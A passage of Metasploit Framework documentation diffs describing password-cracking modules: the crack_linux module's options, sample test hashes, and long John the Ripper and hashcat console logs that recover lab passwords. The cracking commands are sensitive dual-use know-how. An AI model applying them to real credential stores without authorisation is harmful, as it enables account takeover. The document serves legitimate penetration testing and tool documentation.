+[*] Cracking mysql-sha1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=jMcLuSDn --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=300 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type   Username         Cracked Password  Method
+ -----  ---------   --------         ----------------  ------
+ 1379   mssql05     mssql05_toto     toto              Wordlist
+ 1380   mssql       mssql_foo        FOO               Wordlist
+ 1382   mysql       mysql_probe      probe             Wordlist
+ 1383   mysql-sha1  mysql-sha1_tere  tere              Wordlist
+
+[*] Checking raw-sha1,oracle hashes already cracked...
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=zd9AkOJu --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking raw-sha1,oracle hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=zd9AkOJu --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking raw-sha1,oracle hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=zd9AkOJu --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username          Cracked Password  Method
+ -----  ---------        --------          ----------------  ------
+ 1379   mssql05          mssql05_toto      toto              Wordlist
+ 1380   mssql            mssql_foo         FOO               Wordlist
+ 1382   mysql            mysql_probe       probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere   tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO              epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon  epsilon           Wordlist
+
+[*] Checking oracle11 hashes already cracked...
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=t5k5I14z --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle11 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=t5k5I14z --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle11 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=t5k5I14z --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=112 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username          Cracked Password  Method
+ -----  ---------        --------          ----------------  ------
+ 1379   mssql05          mssql05_toto      toto              Wordlist
+ 1380   mssql            mssql_foo         FOO               Wordlist
+ 1382   mysql            mysql_probe       probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere   tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO              epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon  epsilon           Wordlist
+
+[*] Checking oracle12c hashes already cracked...
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=7dadE1Lr --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12300 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle12c hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=7dadE1Lr --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12300 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking oracle12c hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=7dadE1Lr --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12300 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username           Cracked Password  Method
+ -----  ---------        --------           ----------------  ------
+ 1379   mssql05          mssql05_toto       toto              Wordlist
+ 1380   mssql            mssql_foo          FOO               Wordlist
+ 1382   mysql            mysql_probe        probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere    tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO               epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon   epsilon           Wordlist
+ 1388   oracle12c        oracle12c_epsilon  epsilon           Wordlist
+
+[*] Checking dynamic_1034 hashes already cracked...
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=xtcCnmBc --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/wordlist
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking dynamic_1034 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=xtcCnmBc --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking dynamic_1034 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=xtcCnmBc --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-29687-sp1ejs /tmp/jtrtmp20190531-29687-1u8mjuq
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type        Username           Cracked Password  Method
+ -----  ---------        --------           ----------------  ------
+ 1379   mssql05          mssql05_toto       toto              Wordlist
+ 1380   mssql            mssql_foo          FOO               Wordlist
+ 1382   mysql            mysql_probe        probe             Wordlist
+ 1383   mysql-sha1       mysql-sha1_tere    tere              Wordlist
+ 1386   raw-sha1,oracle  DEMO               epsilon           Wordlist
+ 1387   raw-sha1,oracle  oracle11_epsilon   epsilon           Wordlist
+ 1388   oracle12c        oracle12c_epsilon  epsilon           Wordlist
+ 1389   dynamic_1034     example            password          Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                                                                                                                                       Nonreplayable hash  mssql05
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                                                                                                                                               Nonreplayable hash  mssql
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16                                                                                                                               Nonreplayable hash  mssql12
+                       mysql_probe         445ff82636a7ba59                                                                                                                                                                                                                                                             Nonreplayable hash  mysql
+                       mysql-sha1_tere     *5AD8F88516BD021DD43F171E2C785C69F8E54ADB                                                                                                                                                                                                                                    Nonreplayable hash  mysql-sha1
+                       simon               4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM              9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO                S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon    S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon   H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+                       example             md5be86a79bf2043622d58d5453c47d4860                                                                                                                                                                                                                                          Postgres md5        raw-md5,postgres
+                       mssql_foo           FOO                                                                                                                                                                                                                                                                          Password            
+                       mssql05_toto        toto                                                                                                                                                                                                                                                                         Password            
+                       mysql_probe         probe                                                                                                                                                                                                                                                                        Password            
+                       mysql-sha1_tere     tere                                                                                                                                                                                                                                                                         Password            
+                       oracle11_epsilon    epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO                epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       example             password                                                                                                                                                                                                                                                                     Password
+```

documentation/modules/auxiliary/analyze/crack_linux.md

@@ -0,0 +1,664 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Linux
+  based password hashes, such as:
+
+  * `DES` based passwords
+  * `MD5` based passwords
+  * `BSDi` based passwords
+  * `bf`, `bcrypt`, or `blowfish` based passwords
+  * `SHA256` based passwords
+  * `SHA512` based passwords
+
+| Common   | John        | Hashcat |
+|----------|-------------|-------- |
+| des      | descript    | 1500    |
+| md5      | md5crypt    | 500     |
+| bsdi     | bsdicrypt   | 12400   |
+| blowfish | bcrypt      | 3200    |
+| sha256   | sha256crypt | 7400    |
+| sha512   | sha512crypt | 1800    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `des`, `md5`, `bsdi`, `blowfish`, `sha512`, or `sha256` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_linux```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **BLOWFISH**
+
+   Crack Blowfish hashes. Default is `false`.
+
+   **BSDi**
+
+   Crack BSDi hashes. Default is `true`.
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DES**
+
+   Crack DES hashes. Default is `true`.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MD5**
+
+   Crack MD5 hashes. Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHA256**
+
+   Crack SHA256 hashes. Default is `false`.
+
+   **SHA512**
+
+   Crack SHA12 hashes. Default is `false`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+echo "" > /root/.msf4/john.pot
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "\$1\$O3JMY.Tw\$AdLnLjQ/5jXF9.fakegHv/:password" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+echo "toto" >> /tmp/wordlist
+creds add user:des2_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:des_55 hash:rDpJV6xlcXxRM jtr:des
+creds add user:des_pot_55 hash:fakeV6xlcXxRM jtr:des
+creds add user:des_passphrase hash:qiyh4XPJGsOZ2MEAyLkfWqeQ jtr:des
+creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+creds add user:md52_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+creds add user:md5_pot_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.fakegHv/ jtr:md5
+creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256
+creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512
+creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, `blowfish true`, `sha256 true`, `sha512 true` to handle the bfish, sha256 and sha512 hashes,
+and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_linux
+resource (hashes_hashcat.rb)> set blowfish true
+blowfish => true
+resource (hashes_hashcat.rb)> set sha256 true
+sha256 => true
+resource (hashes_hashcat.rb)> set sha512 true
+sha512 => true
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-28293-u4ihgb
+[*] Wordlist file written out to /tmp/jtrtmp20190531-28293-19rhhdd
+[*] Checking md5crypt hashes already cracked...
+[*] Cracking md5crypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 100.0g/s 76800p/s 76800c/s 76800C/s test3:::..tere!
+Warning: passwords printed above might not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking md5crypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking md5crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking md5crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=JKDS2w8U --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=md5crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1303   md5crypt   md5_password      password          Single
+ 1304   md5crypt   md52_password     password          Single
+ 1305   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking descrypt hashes already cracked...
+[*] Cracking descrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 100.0g/s 1102Kp/s 4410Kc/s 4410KC/s test3:::..t1900
+Warning: passwords printed above might be partial and not be all those cracked
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+3g 0:00:00:00 DONE 1/3 (2019-05-31 15:20) 300.0g/s 614200p/s 614400c/s 614400C/s des_pass..Dde_pass
+Warning: passwords printed above might be partial
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking descrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking descrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=TYlIcIco --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=descrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1298   descrypt   des2_password     password          Single
+ 1299   descrypt   des_password      password          Single
+ 1300   descrypt   des_55            55                Normal
+ 1301   descrypt   des_pot_55        55                Already Cracked/POT
+ 1302   descrypt   des_passphrase    passphrase        Normal
+ 1303   md5crypt   md5_password      password          Single
+ 1304   md5crypt   md52_password     password          Single
+ 1305   md5crypt   md5_pot_password  password          Already Cracked/POT
+
+[*] Checking bsdicrypt hashes already cracked...
+[*] Cracking bsdicrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 50.00g/s 102400p/s 102400c/s 102400C/s test3:::..Tere6
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking bsdicrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bsdicrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bsdicrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=24lUijDR --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bsdicrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1298   descrypt   des2_password     password          Single
+ 1299   descrypt   des_password      password          Single
+ 1300   descrypt   des_55            55                Normal
+ 1301   descrypt   des_pot_55        55                Already Cracked/POT
+ 1302   descrypt   des_passphrase    passphrase        Normal
+ 1303   md5crypt   md5_password      password          Single
+ 1304   md5crypt   md52_password     password          Single
+ 1305   md5crypt   md5_pot_password  password          Already Cracked/POT
+ 1306   bsdicrypt  bsdi_password     password          Single
+
+[*] Checking bcrypt hashes already cracked...
+[*] Cracking bcrypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 33.33g/s 2400p/s 2400c/s 2400C/s test3:::..test::0
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking bcrypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bcrypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking bcrypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=YCMwoPbH --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=bcrypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username           Cracked Password  Method
+ -----  ---------  --------           ----------------  ------
+ 1298   descrypt   des2_password      password          Single
+ 1299   descrypt   des_password       password          Single
+ 1300   descrypt   des_55             55                Normal
+ 1301   descrypt   des_pot_55         55                Already Cracked/POT
+ 1302   descrypt   des_passphrase     passphrase        Normal
+ 1303   md5crypt   md5_password       password          Single
+ 1304   md5crypt   md52_password      password          Single
+ 1305   md5crypt   md5_pot_password   password          Already Cracked/POT
+ 1306   bsdicrypt  bsdi_password      password          Single
+ 1309   bcrypt     blowfish_password  password          Single
+
+[*] Checking sha256crypt hashes already cracked...
+[*] Cracking sha256crypt hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 15:20) 2.173g/s 8904p/s 8904c/s 8904C/s test3:::..1foo
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking sha256crypt hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha256crypt hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[*] Cracking sha256crypt hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=XVDR4pAU --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=sha256crypt --wordlist=/tmp/jtrtmp20190531-28293-19rhhdd --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-28293-u4ihgb
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type    Username           Cracked Password  Method
+ -----  ---------    --------           ----------------  ------
+ 1298   descrypt     des2_password      password          Single
+ 1299   descrypt     des_password       password          Single
+ 1300   descrypt     des_55             55                Normal
+ 1301   descrypt     des_pot_55         55                Already Cracked/POT
+ 1302   descrypt     des_passphrase     passphrase        Normal
+ 1303   md5crypt     md5_password       password          Single
+ 1304   md5crypt     md52_password      password          Single
+ 1305   md5crypt     md5_pot_password   password          Already Cracked/POT
+ 1306   bsdicrypt    bsdi_password      password          Single
+ 1307   sha256crypt  sha256_password    password          Single
+ 1309   bcrypt       blowfish_password  password          Single
+
+[*] Checking sha512crypt hashes already cracked...
+[*] Cracking sha512crypt hashes in single mode...
